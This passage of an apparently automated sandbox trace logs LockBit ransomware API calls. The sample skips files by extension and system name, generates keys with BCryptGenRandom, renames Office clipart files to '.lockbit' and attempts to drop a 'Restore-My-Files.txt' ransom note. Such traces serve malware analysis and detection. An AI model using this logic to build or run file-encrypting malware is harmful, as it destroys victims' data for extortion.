(lpString1=".sdb", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.170] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.170] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.lockbit") returned 72 [0110.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.170] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.170] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.171] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=40030) returned 1 [0110.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.172] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.176] malloc (_Size=0xa6) returned 0x77d800 [0110.176] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.178] free (_Block=0x77d800) [0110.178] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.178] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.179] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.179] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c4300, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5d8c4300, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00372_.WMF", cAlternateFileName="")) returned 1 [0110.179] lstrcmpiW (lpString1=".", lpString2="DD00372_.WMF") returned -1 [0110.179] lstrcmpiW (lpString1="..", lpString2="DD00372_.WMF") returned -1 [0110.179] PathFindExtensionW (pszPath="DD00372_.WMF") returned=".WMF" [0110.179] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.179] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.180] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.180] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00372_.WMF") returned 1 [0110.180] lstrcmpiW (lpString1="ntldr", lpString2="DD00372_.WMF") returned 1 [0110.180] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00372_.WMF") returned 1 [0110.180] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00372_.WMF") returned -1 [0110.180] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00372_.WMF") returned -1 [0110.180] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00372_.WMF") returned 1 [0110.180] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00372_.WMF") returned 1 [0110.181] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.181] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned=".WMF" [0110.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.181] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.181] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.182] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.182] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.182] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.182] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.182] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.182] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.lockbit") returned 72 [0110.182] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.183] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.183] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.183] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=792) returned 1 [0110.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.184] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.185] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.193] malloc (_Size=0xa6) returned 0x77d800 [0110.193] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.193] free (_Block=0x77d800) [0110.193] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.193] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.193] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00405_.WMF", cAlternateFileName="")) returned 1 [0110.193] lstrcmpiW (lpString1=".", lpString2="DD00405_.WMF") returned -1 [0110.193] lstrcmpiW (lpString1="..", lpString2="DD00405_.WMF") returned -1 [0110.193] PathFindExtensionW (pszPath="DD00405_.WMF") returned=".WMF" [0110.193] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.193] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.194] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.194] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00405_.WMF") returned 1 [0110.195] lstrcmpiW (lpString1="ntldr", lpString2="DD00405_.WMF") returned 1 [0110.195] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00405_.WMF") returned 1 [0110.195] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00405_.WMF") returned -1 [0110.195] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00405_.WMF") returned -1 [0110.195] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00405_.WMF") returned 1 [0110.195] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00405_.WMF") returned 1 [0110.195] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.195] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned=".WMF" [0110.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.195] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.195] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.196] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.lockbit") returned 72 [0110.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.197] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.197] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.197] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=17584) returned 1 [0110.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.197] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.197] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.198] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.205] malloc (_Size=0xa6) returned 0x77d800 [0110.205] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.211] free (_Block=0x77d800) [0110.211] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.211] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.211] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00407_.WMF", cAlternateFileName="")) returned 1 [0110.211] lstrcmpiW (lpString1=".", lpString2="DD00407_.WMF") returned -1 [0110.211] lstrcmpiW (lpString1="..", lpString2="DD00407_.WMF") returned -1 [0110.211] PathFindExtensionW (pszPath="DD00407_.WMF") returned=".WMF" [0110.211] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.211] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".shs", lpString2=".WMF") 